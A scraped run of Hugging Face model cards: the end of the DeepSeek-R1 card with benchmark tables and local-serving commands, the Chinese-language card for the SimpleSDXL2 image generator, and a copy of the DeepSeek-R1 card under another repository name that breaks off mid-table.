### DeepSeek-R1-Distill Models <div align="center"> | **Model** | **Base Model** | **Download** | | :------------: | :------------: | :------------: | | DeepSeek-R1-Distill-Qwen-1.5B | [Qwen2.5-Math-1.5B](https://huggingface.co/Qwen/Qwen2.5-Math-1.5B) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Qwen-1.5B) | | DeepSeek-R1-Distill-Qwen-7B | [Qwen2.5-Math-7B](https://huggingface.co/Qwen/Qwen2.5-Math-7B) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Qwen-7B) | | DeepSeek-R1-Distill-Llama-8B | [Llama-3.1-8B](https://huggingface.co/meta-llama/Llama-3.1-8B) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Llama-8B) | | DeepSeek-R1-Distill-Qwen-14B | [Qwen2.5-14B](https://huggingface.co/Qwen/Qwen2.5-14B) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Qwen-14B) | |DeepSeek-R1-Distill-Qwen-32B | [Qwen2.5-32B](https://huggingface.co/Qwen/Qwen2.5-32B) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Qwen-32B) | | DeepSeek-R1-Distill-Llama-70B | [Llama-3.3-70B-Instruct](https://huggingface.co/meta-llama/Llama-3.3-70B-Instruct) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Llama-70B) | </div> DeepSeek-R1-Distill models are fine-tuned based on open-source models, using samples generated by DeepSeek-R1. We slightly change their configs and tokenizers. Please use our setting to run these models. ## 4. Evaluation Results ### DeepSeek-R1-Evaluation For all our models, the maximum generation length is set to 32,768 tokens. For benchmarks requiring sampling, we use a temperature of $0.6$, a top-p value of $0.95$, and generate 64 responses per query to estimate pass@1. <div align="center"> | Category | Benchmark (Metric) | Claude-3.5-Sonnet-1022 | GPT-4o 0513 | DeepSeek V3 | OpenAI o1-mini | OpenAI o1-1217 | DeepSeek R1 | |----------|-------------------|----------------------|------------|--------------|----------------|------------|--------------| | | Architecture | - | - | MoE | - | - | MoE | | | # Activated Params | - | - | 37B | - | - | 37B | | | # Total Params | - | - | 671B | - | - | 671B | | English | MMLU (Pass@1) | 88.3 | 87.2 | 88.5 | 85.2 | **91.8** | 90.8 | | | MMLU-Redux (EM) | 88.9 | 88.0 | 89.1 | 86.7 | - | **92.9** | | | MMLU-Pro (EM) | 78.0 | 72.6 | 75.9 | 80.3 | - | **84.0** | | | DROP (3-shot F1) | 88.3 | 83.7 | 91.6 | 83.9 | 90.2 | **92.2** | | | IF-Eval (Prompt Strict) | **86.5** | 84.3 | 86.1 | 84.8 | - | 83.3 | | | GPQA-Diamond (Pass@1) | 65.0 | 49.9 | 59.1 | 60.0 | **75.7** | 71.5 | | | SimpleQA (Correct) | 28.4 | 38.2 | 24.9 | 7.0 | **47.0** | 30.1 | | | FRAMES (Acc.) | 72.5 | 80.5 | 73.3 | 76.9 | - | **82.5** | | | AlpacaEval2.0 (LC-winrate) | 52.0 | 51.1 | 70.0 | 57.8 | - | **87.6** | | | ArenaHard (GPT-4-1106) | 85.2 | 80.4 | 85.5 | 92.0 | - | **92.3** | | Code | LiveCodeBench (Pass@1-COT) | 33.8 | 34.2 | - | 53.8 | 63.4 | **65.9** | | | Codeforces (Percentile) | 20.3 | 23.6 | 58.7 | 93.4 | **96.6** | 96.3 | | | Codeforces (Rating) | 717 | 759 | 1134 | 1820 | **2061** | 2029 | | | SWE Verified (Resolved) | **50.8** | 38.8 | 42.0 | 41.6 | 48.9 | 49.2 | | | Aider-Polyglot (Acc.) 
| 45.3 | 16.0 | 49.6 | 32.9 | **61.7** | 53.3 | | Math | AIME 2024 (Pass@1) | 16.0 | 9.3 | 39.2 | 63.6 | 79.2 | **79.8** | | | MATH-500 (Pass@1) | 78.3 | 74.6 | 90.2 | 90.0 | 96.4 | **97.3** | | | CNMO 2024 (Pass@1) | 13.1 | 10.8 | 43.2 | 67.6 | - | **78.8** | | Chinese | CLUEWSC (EM) | 85.4 | 87.9 | 90.9 | 89.9 | - | **92.8** | | | C-Eval (EM) | 76.7 | 76.0 | 86.5 | 68.9 | - | **91.8** | | | C-SimpleQA (Correct) | 55.4 | 58.7 | **68.0** | 40.3 | - | 63.7 | </div> ### Distilled Model Evaluation <div align="center"> | Model | AIME 2024 pass@1 | AIME 2024 cons@64 | MATH-500 pass@1 | GPQA Diamond pass@1 | LiveCodeBench pass@1 | CodeForces rating | |------------------------------------------|------------------|-------------------|-----------------|----------------------|----------------------|-------------------| | GPT-4o-0513 | 9.3 | 13.4 | 74.6 | 49.9 | 32.9 | 759 | | Claude-3.5-Sonnet-1022 | 16.0 | 26.7 | 78.3 | 65.0 | 38.9 | 717 | | o1-mini | 63.6 | 80.0 | 90.0 | 60.0 | 53.8 | **1820** | | QwQ-32B-Preview | 44.0 | 60.0 | 90.6 | 54.5 | 41.9 | 1316 | | DeepSeek-R1-Distill-Qwen-1.5B | 28.9 | 52.7 | 83.9 | 33.8 | 16.9 | 954 | | DeepSeek-R1-Distill-Qwen-7B | 55.5 | 83.3 | 92.8 | 49.1 | 37.6 | 1189 | | DeepSeek-R1-Distill-Qwen-14B | 69.7 | 80.0 | 93.9 | 59.1 | 53.1 | 1481 | | DeepSeek-R1-Distill-Qwen-32B | **72.6** | 83.3 | 94.3 | 62.1 | 57.2 | 1691 | | DeepSeek-R1-Distill-Llama-8B | 50.4 | 80.0 | 89.1 | 49.0 | 39.6 | 1205 | | DeepSeek-R1-Distill-Llama-70B | 70.0 | **86.7** | **94.5** | **65.2** | **57.5** | 1633 | </div> ## 5. Chat Website & API Platform You can chat with DeepSeek-R1 on DeepSeek's official website: [chat.deepseek.com](https://chat.deepseek.com), and switch on the button "DeepThink" We also provide OpenAI-Compatible API at DeepSeek Platform: [platform.deepseek.com](https://platform.deepseek.com/) ## 6. How to Run Locally ### DeepSeek-R1 Models Please visit [DeepSeek-V3](https://github.com/deepseek-ai/DeepSeek-V3) repo for more information about running DeepSeek-R1 locally. **NOTE: Hugging Face's Transformers has not been directly supported yet.** ### DeepSeek-R1-Distill Models DeepSeek-R1-Distill models can be utilized in the same manner as Qwen or Llama models. For instance, you can easily start a service using [vLLM](https://github.com/vllm-project/vllm): ```shell vllm serve deepseek-ai/DeepSeek-R1-Distill-Qwen-32B --tensor-parallel-size 2 --max-model-len 32768 --enforce-eager ``` You can also easily start a service using [SGLang](https://github.com/sgl-project/sglang) ```bash python3 -m sglang.launch_server --model deepseek-ai/DeepSeek-R1-Distill-Qwen-32B --trust-remote-code --tp 2 ``` ### Usage Recommendations **We recommend adhering to the following configurations when utilizing the DeepSeek-R1 series models, including benchmarking, to achieve the expected performance:** 1. Set the temperature within the range of 0.5-0.7 (0.6 is recommended) to prevent endless repetitions or incoherent outputs. 2. **Avoid adding a system prompt; all instructions should be contained within the user prompt.** 3. For mathematical problems, it is advisable to include a directive in your prompt such as: "Please reason step by step, and put your final answer within \boxed{}." 4. When evaluating model performance, it is recommended to conduct multiple tests and average the results. 
Additionally, we have observed that the DeepSeek-R1 series models tend to bypass the thinking pattern (i.e., outputting "\<think\>\n\n\</think\>") when responding to certain queries, which can adversely affect the model's performance. **To ensure that the model engages in thorough reasoning, we recommend forcing the model to begin its response with "\<think\>\n" in every output.** ## 7. License This code repository and the model weights are licensed under the [MIT License](https://github.com/deepseek-ai/DeepSeek-R1/blob/main/LICENSE). The DeepSeek-R1 series supports commercial use and allows any modifications and derivative works, including, but not limited to, distillation for training other LLMs. Please note that: - DeepSeek-R1-Distill-Qwen-1.5B, DeepSeek-R1-Distill-Qwen-7B, DeepSeek-R1-Distill-Qwen-14B and DeepSeek-R1-Distill-Qwen-32B are derived from the [Qwen-2.5 series](https://github.com/QwenLM/Qwen2.5), which are originally licensed under the [Apache 2.0 License](https://huggingface.co/Qwen/Qwen2.5-1.5B/blob/main/LICENSE), and are now fine-tuned with 800k samples curated with DeepSeek-R1. - DeepSeek-R1-Distill-Llama-8B is derived from Llama3.1-8B-Base and is originally licensed under the [llama3.1 license](https://huggingface.co/meta-llama/Llama-3.1-8B/blob/main/LICENSE). - DeepSeek-R1-Distill-Llama-70B is derived from Llama3.3-70B-Instruct and is originally licensed under the [llama3.3 license](https://huggingface.co/meta-llama/Llama-3.3-70B-Instruct/blob/main/LICENSE). ## 8. Citation ``` @misc{deepseekai2025deepseekr1incentivizingreasoningcapability, title={DeepSeek-R1: Incentivizing Reasoning Capability in LLMs via Reinforcement Learning}, author={DeepSeek-AI}, year={2025}, eprint={2501.12948}, archivePrefix={arXiv}, primaryClass={cs.CL}, url={https://arxiv.org/abs/2501.12948}, } ``` ## 9. Contact If you have any questions, please raise an issue or contact us at [[email protected]]([email protected]).
metercai/SimpleSDXL2
metercai
2025-05-30T08:13:22Z
1,246
32
diffusers
[ "diffusers", "onnx", "safetensors", "gguf", "license:apache-2.0", "region:us" ]
null
2024-05-30T13:46:27Z
--- license: apache-2.0 --- ## SimpleSDXL2 - The most powerful Chinese creative image generator: run Hunyuan, Kolors, SD3m and Flux with just 6 GB of VRAM! <div align=center><img src="https://github.com/user-attachments/assets/98715a4d-9f4a-4846-ae62-eb8d69793d31"></div> ### 🚀 Recommended Bilibili video: [Running Flux on 6 GB of VRAM](https://www.bilibili.com/video/BV1KJWreyEuU) : https://www.bilibili.com/video/BV1KJWreyEuU ### 🚀 Feishu wiki: [SimpleSDXL Creative Image Generation Guide](https://acnmokx5gwds.feishu.cn/wiki/QK3LwOp2oiRRaTkFRhYcO4LonGe), covering how to quickly download, install and run, how to generate creative images, how to use SimpleSDXL in different scenarios, and more. ## 🔔 Latest Updates - [2024-09-16] <b>Unlocked Flux LoRA and Kolors LoRA. Moved the automatic retouch switch into the enhanced retouch tab. Added a prompt-panel switch that can be clicked to open the batch wildcard panel. Moved the prompt interrogation and image parameter extraction tabs into the parameter settings bar. Added preset-based filtering of base models. Fixed skip and interrupt logic bugs in the Comfyd engine. Improved preset parameters and preset navigation. Flux models now adapt automatically to the hardware environment. Selected the Hyp8Q5KM model as the preferred option, which supports Flux LoRA and balances speed and quality. Added two seamless-tiling presets. Upgraded comfyd to the latest version. Improved the download, installation and startup flow, with mandatory base-package checks and a model-package installation script.</b> - [2024.08.20] Further optimized the new architecture, improved compatibility on Windows, and reduced the resource overhead of switching between the Fooocus and Comfy backends. Optimized Flux image generation to run on as little as 6 GB of VRAM, with a quality-first Fluxdev preset and a speed-first Flux+ preset that adapt automatically to system resources. Synced with upstream v2.5.5 and refined the enhanced retouch UI to better match Fooocus interaction habits. - [2024.07.31] Optimized the new architecture for better stability and speed. Added support for Kuaishou's Kolors model, so that besides SDXL, SimpleSDXL2 can generate images with Pony v6, Playground-v2.5, SD3m, Hunyuan and Kolors on a 6 GB GPU, covering more scenarios. Synced with upstream v2.5.2 and adapted the retouching UI to make it easier for Chinese users to understand and use. - [2024.06.30] Extended the architecture with a new Comfy backend and fully upgraded to SimpleSDXL2. Supports SDXL, Hunyuan, SD3 and Playground-v2.5 local models with as little as 6 GB of GPU memory, while keeping Fooocus's simple, efficient and stable generation style. Added an image blending and relighting module that can generate foregrounds and masks on its own and can automatically cut out products or people and blend them into new scenes. Upgraded the OBP one-click prompt to the latest version. Overall UI improvements. - [2024.05.28] Synced with upstream v2.4.3, adding NSFW filtering and other features. - [2024.04.23] Upgraded OBP to the latest version and integrated the [Superprompt](https://huggingface.co/roborovski/superprompt-v1) extension to enrich prompts with extra detail. Added an SD3 image-generation API interface: apply for a free membership at [stability.ai](https://stability.ai/membership), obtain an API key, and generate images with the new SD3 engine seamlessly. UI improvements, including integrating the OBP and Superprompt entry points into the prompt box, adding a preset navigation overlay hint, a token counter for the prompt box, and surfacing several image-to-image parameters on the main page. <b>Important: if this project brings you convenience and value, don't hesitate to give it a star "⭐️" to help it grow! 😜<br> Note: Please don't forget to give us a star if you like this project. Thanks! 😜</b> ## For download, installation and usage, see the wiki: [SimpleSDXL Creative Image Generation Guide](https://acnmokx5gwds.feishu.cn/wiki/QK3LwOp2oiRRaTkFRhYcO4LonGe) ### If you prefer the old version, you can skip the upgrade and keep running it - Complete package of the standalone SimpleSDXL1 branch, including environment, program and default models; it will only receive bug fixes, no new features: [SimpleSDXL1_win64_all.zip (30G)](https://hf-mirror.com/metercai/SimpleSDXL2/resolve/main/SimpleSDXL1_win64_all.zip) ## What's SimpleSDXL? - **Simplify the complex** The essence of AI should be turning complexity into simplicity: simpler operation, and ideas that are easier to realize. SimpleSDXL keeps Fooocus's ease of use, centers on the SDXL model ecosystem, and moves further toward being open and controllable, simple and easy to use, and feature-complete. - **Adapted for Chinese users** The Chinese-language environment differs from the English one in many ways — not only in language, but also in habits of thinking, ways of operating, and network conditions. Making things simpler and more pleasant for Chinese users is SimpleSDXL's original motivation. - **Scenario customization** Text-to-image and image-to-image cover many usage scenarios and need better configuration and customization. Built on **presets and parameter-embedded images**, SimpleSDXL improves Fooocus's **openness and customizability** for specific scenarios and unlocks the full power of SDXL. ## SimpleSDXL2 New Architecture <img width="500" align=center src="https://github.com/metercai/SimpleSDXL/assets/5652458/364df3ce-3420-4cec-b26e-f315c76b4c1e"> ## Enhanced features compared to Fooocus Features are enhanced on top of Fooocus, with seamless upgrades, synchronized iteration and parallel use. The UI is also adapted for mobile, so PC and phone can be operated in sync. ### Chinese-English mixed prompts Choose freely between online and offline translation, with support for editing after translation — better suited to prompt writing.
<br> <img width="300" align=right src="https://github.com/metercai/SimpleSDXL/assets/5652458/707999e5-c776-4321-9048-5ad275263ff0"> - [x] **中英文混合编辑** 对提示词文本进行中英文切分后分别翻译再合并,适配提示词类的表达场景。 - [x] **在线和离线翻译器** 可自动安装离线翻译大模型和小尺寸的瘦模型,也可选择第三方翻译接口。离线模型需自身算力支持,第三方接口接入便捷成本低,但增加了接口依赖。用户可根据情况自主配置选>择。 - [x] **支持翻译后再编辑** 机器翻译的结果质量都不可控,存在翻译质量差导致生成内容偏差的现象。翻译后再编辑可以显性化翻译质量,提供用户再优化调整处理的空间。 - [x] **多大厂接口随机选** 选择国内大厂(百度、阿里和搜狗)的稳定接口,每次启动时随机选择,运行态相对固定。既避免对接口冲击又保持翻译的一致性。 - [ ] **私有翻译接口定制** 可以配置私有接口,方便对接OpenAI等大语言模型的翻译能力。 ### 智能抠图生成蒙板 / Intelligent cutout generation mask 具有语义识别的多种抠图算法,可自动生成蒙板,方便生成图片的组合加工。 <br> Multiple cropping algorithms with semantic recognition that can automatically generate masks, facilitating the combination processing of generated images.<br> - [x] **智能算法抠图** 可以基于u2net进行图像分割,对重绘图片进行前后景分割,人物主体分割,并生成对应蒙板进行重绘。 - [x] **语义识别抠图** 可以基于bert+Sam,在语义理解基础上识别图片内容,再进行自动分割,生成蒙板后进行重绘。 - [ ] **点击识别抠图** 点击图片某个区域,基于Sam算法对点击所在主体进行自动识别和分割,生成蒙板后进行重绘。 ### 通配符批量提示词 / Wildcard batch prompt words 支持通配符词组表达和触发展示,可随机批量生成同Seed下的一组图片。<br> Supports wildcard phrase expressions and triggering display, allowing for random batch generate a set of images under the same seed. <img width="380" align=right src="https://github.com/metercai/SimpleSDXL/assets/5652458/4b10e6de-b026-41ea-a206-77d6f9fdf1cd"> - [x] **词组语法** 支持[Words]词组,以","分割的词列表。表示在同一seed下从每个words词组抽词进行组合批量生成图片。每种组合1张图片,总量是各词组词数的乘积,以实际需要的数量为准,不受出图数量参数的限制。 - [x] **通配符组词** 用通配符定义词组,格式为:`[__wildcard__:R|Lnumber:start]` R表示随机抽,L表示按顺序抽,默认=R;number是抽取的数量,默认=1;start是在顺序抽取时从第几个开始抽,默认=1。具体语法说明见[通配符ReadMe](https://github.com/metercai/SimpleSDXL/tree/SimpleSDXL/wildcards/) - [x] **自动触发输入** 提示词框在输入'['或'_'时可自动触发通配符输入工具,可以通过界面选择追加通配符到提示词框。 - [ ] **嵌套及动态加载** 支持通配符的多级嵌套和动态加载,增强通配符的表达能力。 - [ ] **定制和推送** 支持自主定制通配符快捷方式,并推送给朋友使用。 ### 增强预置包和模型下载 / Enhanced preset and adapted for download 预置包可通过界面切换和生成,模型下载会根据IP自动选择内外源。 <br> The preset can be switched and generated through UI, and the model download will automatically select sources based on the access IP. - [x] **预置包导航** 将presets目录下的预置包配置文件生成顶部导航入口,户点击顶部预置包导航后,调取对应配置文件,重置出图环境参数和相关配置。 - [x] **生成预置包** 将当前出图环境参数打包保存为新的预置包,将预置包文件存入presets目录下,自动加入顶部导航。 - [x] **扩展预置参数** 扩展主线的预置包参数范围,补充开发者模式的参数,以及风格样式的定义和通配符的定义。支持的预置包参数见[预置包ReadMe](https://github.com/metercai/SimpleSDXL/tree/SimpleSDXL/presets/) - [x] **统一模型ID和下载** 对接模型信息库,使用以模型文件哈希为基础的统一模型MUID。可自动检测预置包出图环境的可用性,缺失模型文件可自动下载补齐。 - [x] **出图保护** 当系统环境进入出图状态时,顶部导航不可点击,禁止加载预置包冲击出图环境。 ### 图片集浏览和管理 / Finished image sets browsing and management 原生版仅能浏览当前生成的图片集,已生成图片管理非常简陋。 <br> Fooocus only can browse the current generated image set. Finished images management is very simple. 
- [x] **Finished image search** Finished images can be searched by generation date. If too many images were generated on one day, they are grouped into sub-directory indexes according to the screen size so the gallery component is not overwhelmed. - [x] **Finished image deletion** Broken images can be deleted on the spot, with the corresponding generation-parameter log entries removed as well, keeping images and parameter logs consistent. - [x] **Automatic prompt backfill** While browsing finished image sets, the image's prompt can be backfilled automatically, which makes it easy to compare and edit prompts and regenerate images. - [x] **Image set interaction improvements** The finished image set index bar adapts to the current state, collapsing and adjusting automatically so that long directory lists do not crowd the page and interfere with creation. ### Parameter-embedded images and regeneration from extracted parameters Enhanced parameter management: parameters can be viewed and embedded into images instantly, or extracted and backfilled into the UI for a second generation. - [x] **View parameters** The generation parameters of the current image are extracted from the generation log and shown in full in an overlay; as you switch through the gallery, the overlay content follows. - [x] **Regenerate from parameters** The current image's generation parameters override the default preset parameters and the prompt is backfilled, so you can modify parameters or the prompt and generate again. - [x] **Parameter-embedded images** When system-wide parameter embedding is not enabled, the current image's parameters can be packaged and embedded, and saved to a dedicated directory for parameter-embedded images. Parameters can later be extracted from such images with the image description tool to form a new generation configuration. ### Cloud compute and more - [x] **Cloud deployment adaptation** Added a root-path startup parameter, `--webroot`. When deployed on a cloud server behind a front-end proxy, the root path must be configured to avoid confusion in URL paths. - [ ] **Cloud compute** Front end and back end are separated, so a local generation backend can serve remote front ends, splitting UI control from generation compute and letting devices without a GPU still generate images with SDXL models. - [x] **Upstream sync** SimpleSDXL's enhancement code is well structured and stays compatible with and extensible against the upstream Fooocus releases, so new upstream features and bug fixes can be merged promptly. ## Online discussion: QQ group 938075852 — join to chat about how to use it and what new features you'd like <div align=center><img width="250" src="https://github.com/metercai/SimpleSDXL/assets/5652458/28f8c604-79eb-467d-956c-b9137c784194"></div> ## Star History <a href="https://star-history.com/#metercai/SimpleSDXL&Date"> <picture> <source media="(prefers-color-scheme: dark)" srcset="https://api.star-history.com/svg?repos=metercai/SimpleSDXL&type=Date&theme=dark" /> <source media="(prefers-color-scheme: light)" srcset="https://api.star-history.com/svg?repos=metercai/SimpleSDXL&type=Date" /> <img alt="Star History Chart" src="https://api.star-history.com/svg?repos=metercai/SimpleSDXL&type=Date" /> </picture> </a> ---
Jackmin108/qwen-7b-rl-step-31
Jackmin108
2025-05-30T08:13:15Z
0
0
transformers
[ "transformers", "safetensors", "qwen2", "text-generation", "conversational", "arxiv:2501.12948", "license:mit", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-05-30T05:04:02Z
--- license: mit library_name: transformers --- # DeepSeek-R1 <!-- markdownlint-disable first-line-h1 --> <!-- markdownlint-disable html --> <!-- markdownlint-disable no-duplicate-header --> <div align="center"> <img src="https://github.com/deepseek-ai/DeepSeek-V2/blob/main/figures/logo.svg?raw=true" width="60%" alt="DeepSeek-V3" /> </div> <hr> <div align="center" style="line-height: 1;"> <a href="https://www.deepseek.com/" target="_blank" style="margin: 2px;"> <img alt="Homepage" src="https://github.com/deepseek-ai/DeepSeek-V2/blob/main/figures/badge.svg?raw=true" style="display: inline-block; vertical-align: middle;"/> </a> <a href="https://chat.deepseek.com/" target="_blank" style="margin: 2px;"> <img alt="Chat" src="https://img.shields.io/badge/🤖%20Chat-DeepSeek%20R1-536af5?color=536af5&logoColor=white" style="display: inline-block; vertical-align: middle;"/> </a> <a href="https://huggingface.co/deepseek-ai" target="_blank" style="margin: 2px;"> <img alt="Hugging Face" src="https://img.shields.io/badge/%F0%9F%A4%97%20Hugging%20Face-DeepSeek%20AI-ffc107?color=ffc107&logoColor=white" style="display: inline-block; vertical-align: middle;"/> </a> </div> <div align="center" style="line-height: 1;"> <a href="https://discord.gg/Tc7c45Zzu5" target="_blank" style="margin: 2px;"> <img alt="Discord" src="https://img.shields.io/badge/Discord-DeepSeek%20AI-7289da?logo=discord&logoColor=white&color=7289da" style="display: inline-block; vertical-align: middle;"/> </a> <a href="https://github.com/deepseek-ai/DeepSeek-V2/blob/main/figures/qr.jpeg?raw=true" target="_blank" style="margin: 2px;"> <img alt="Wechat" src="https://img.shields.io/badge/WeChat-DeepSeek%20AI-brightgreen?logo=wechat&logoColor=white" style="display: inline-block; vertical-align: middle;"/> </a> <a href="https://twitter.com/deepseek_ai" target="_blank" style="margin: 2px;"> <img alt="Twitter Follow" src="https://img.shields.io/badge/Twitter-deepseek_ai-white?logo=x&logoColor=white" style="display: inline-block; vertical-align: middle;"/> </a> </div> <div align="center" style="line-height: 1;"> <a href="https://github.com/deepseek-ai/DeepSeek-R1/blob/main/LICENSE" style="margin: 2px;"> <img alt="License" src="https://img.shields.io/badge/License-MIT-f5de53?&color=f5de53" style="display: inline-block; vertical-align: middle;"/> </a> </div> <p align="center"> <a href="https://github.com/deepseek-ai/DeepSeek-R1/blob/main/DeepSeek_R1.pdf"><b>Paper Link</b>👁️</a> </p> ## 1. Introduction We introduce our first-generation reasoning models, DeepSeek-R1-Zero and DeepSeek-R1. DeepSeek-R1-Zero, a model trained via large-scale reinforcement learning (RL) without supervised fine-tuning (SFT) as a preliminary step, demonstrated remarkable performance on reasoning. With RL, DeepSeek-R1-Zero naturally emerged with numerous powerful and interesting reasoning behaviors. However, DeepSeek-R1-Zero encounters challenges such as endless repetition, poor readability, and language mixing. To address these issues and further enhance reasoning performance, we introduce DeepSeek-R1, which incorporates cold-start data before RL. DeepSeek-R1 achieves performance comparable to OpenAI-o1 across math, code, and reasoning tasks. To support the research community, we have open-sourced DeepSeek-R1-Zero, DeepSeek-R1, and six dense models distilled from DeepSeek-R1 based on Llama and Qwen. DeepSeek-R1-Distill-Qwen-32B outperforms OpenAI-o1-mini across various benchmarks, achieving new state-of-the-art results for dense models. 
**NOTE: Before running DeepSeek-R1 series models locally, we kindly recommend reviewing the [Usage Recommendation](#usage-recommendations) section.** <p align="center"> <img width="80%" src="figures/benchmark.jpg"> </p> ## 2. Model Summary --- **Post-Training: Large-Scale Reinforcement Learning on the Base Model** - We directly apply reinforcement learning (RL) to the base model without relying on supervised fine-tuning (SFT) as a preliminary step. This approach allows the model to explore chain-of-thought (CoT) for solving complex problems, resulting in the development of DeepSeek-R1-Zero. DeepSeek-R1-Zero demonstrates capabilities such as self-verification, reflection, and generating long CoTs, marking a significant milestone for the research community. Notably, it is the first open research to validate that reasoning capabilities of LLMs can be incentivized purely through RL, without the need for SFT. This breakthrough paves the way for future advancements in this area. - We introduce our pipeline to develop DeepSeek-R1. The pipeline incorporates two RL stages aimed at discovering improved reasoning patterns and aligning with human preferences, as well as two SFT stages that serve as the seed for the model's reasoning and non-reasoning capabilities. We believe the pipeline will benefit the industry by creating better models. --- **Distillation: Smaller Models Can Be Powerful Too** - We demonstrate that the reasoning patterns of larger models can be distilled into smaller models, resulting in better performance compared to the reasoning patterns discovered through RL on small models. The open source DeepSeek-R1, as well as its API, will benefit the research community to distill better smaller models in the future. - Using the reasoning data generated by DeepSeek-R1, we fine-tuned several dense models that are widely used in the research community. The evaluation results demonstrate that the distilled smaller dense models perform exceptionally well on benchmarks. We open-source distilled 1.5B, 7B, 8B, 14B, 32B, and 70B checkpoints based on Qwen2.5 and Llama3 series to the community. ## 3. Model Downloads ### DeepSeek-R1 Models <div align="center"> | **Model** | **#Total Params** | **#Activated Params** | **Context Length** | **Download** | | :------------: | :------------: | :------------: | :------------: | :------------: | | DeepSeek-R1-Zero | 671B | 37B | 128K | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Zero) | | DeepSeek-R1 | 671B | 37B | 128K | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1) | </div> DeepSeek-R1-Zero & DeepSeek-R1 are trained based on DeepSeek-V3-Base. For more details regarding the model architecture, please refer to [DeepSeek-V3](https://github.com/deepseek-ai/DeepSeek-V3) repository. 
### DeepSeek-R1-Distill Models <div align="center"> | **Model** | **Base Model** | **Download** | | :------------: | :------------: | :------------: | | DeepSeek-R1-Distill-Qwen-1.5B | [Qwen2.5-Math-1.5B](https://huggingface.co/Qwen/Qwen2.5-Math-1.5B) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Qwen-1.5B) | | DeepSeek-R1-Distill-Qwen-7B | [Qwen2.5-Math-7B](https://huggingface.co/Qwen/Qwen2.5-Math-7B) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Qwen-7B) | | DeepSeek-R1-Distill-Llama-8B | [Llama-3.1-8B](https://huggingface.co/meta-llama/Llama-3.1-8B) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Llama-8B) | | DeepSeek-R1-Distill-Qwen-14B | [Qwen2.5-14B](https://huggingface.co/Qwen/Qwen2.5-14B) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Qwen-14B) | |DeepSeek-R1-Distill-Qwen-32B | [Qwen2.5-32B](https://huggingface.co/Qwen/Qwen2.5-32B) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Qwen-32B) | | DeepSeek-R1-Distill-Llama-70B | [Llama-3.3-70B-Instruct](https://huggingface.co/meta-llama/Llama-3.3-70B-Instruct) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Llama-70B) | </div> DeepSeek-R1-Distill models are fine-tuned based on open-source models, using samples generated by DeepSeek-R1. We slightly change their configs and tokenizers. Please use our setting to run these models. ## 4. Evaluation Results ### DeepSeek-R1-Evaluation For all our models, the maximum generation length is set to 32,768 tokens. For benchmarks requiring sampling, we use a temperature of $0.6$, a top-p value of $0.95$, and generate 64 responses per query to estimate pass@1. <div align="center"> | Category | Benchmark (Metric) | Claude-3.5-Sonnet-1022 | GPT-4o 0513 | DeepSeek V3 | OpenAI o1-mini | OpenAI o1-1217 | DeepSeek R1 | |----------|-------------------|----------------------|------------|--------------|----------------|------------|--------------| | | Architecture | - | - | MoE | - | - | MoE | | | # Activated Params | - | - | 37B | - | - | 37B | | | # Total Params | - | - | 671B | - | - | 671B | | English | MMLU (Pass@1) | 88.3 | 87.2 | 88.5 | 85.2 | **91.8** | 90.8 | | | MMLU-Redux (EM) | 88.9 | 88.0 | 89.1 | 86.7 | - | **92.9** | | | MMLU-Pro (EM) | 78.0 | 72.6 | 75.9 | 80.3 | - | **84.0** | | | DROP (3-shot F1) | 88.3 | 83.7 | 91.6 | 83.9 | 90.2 | **92.2** | | | IF-Eval (Prompt Strict) | **86.5** | 84.3 | 86.1 | 84.8 | - | 83.3 | | | GPQA-Diamond (Pass@1) | 65.0 | 49.9 | 59.1 | 60.0 | **75.7** | 71.5 | | | SimpleQA (Correct) | 28.4 | 38.2 | 24.9 | 7.0 | **47.0** | 30.1 | | | FRAMES (Acc.) | 72.5 | 80.5 | 73.3 | 76.9 | - | **82.5** | | | AlpacaEval2.0 (LC-winrate) | 52.0 | 51.1 | 70.0 | 57.8 | - | **87.6** | | | ArenaHard (GPT-4-1106) | 85.2 | 80.4 | 85.5 | 92.0 | - | **92.3** | | Code | LiveCodeBench (Pass@1-COT) | 33.8 | 34.2 | - | 53.8 | 63.4 | **65.9** | | | Codeforces (Percentile) | 20.3 | 23.6 | 58.7 | 93.4 | **96.6** | 96.3 | | | Codeforces (Rating) | 717 | 759 | 1134 | 1820 | **2061** | 2029 | | | SWE Verified (Resolved) | **50.8** | 38.8 | 42.0 | 41.6 | 48.9 | 49.2 | | | Aider-Polyglot (Acc.) 
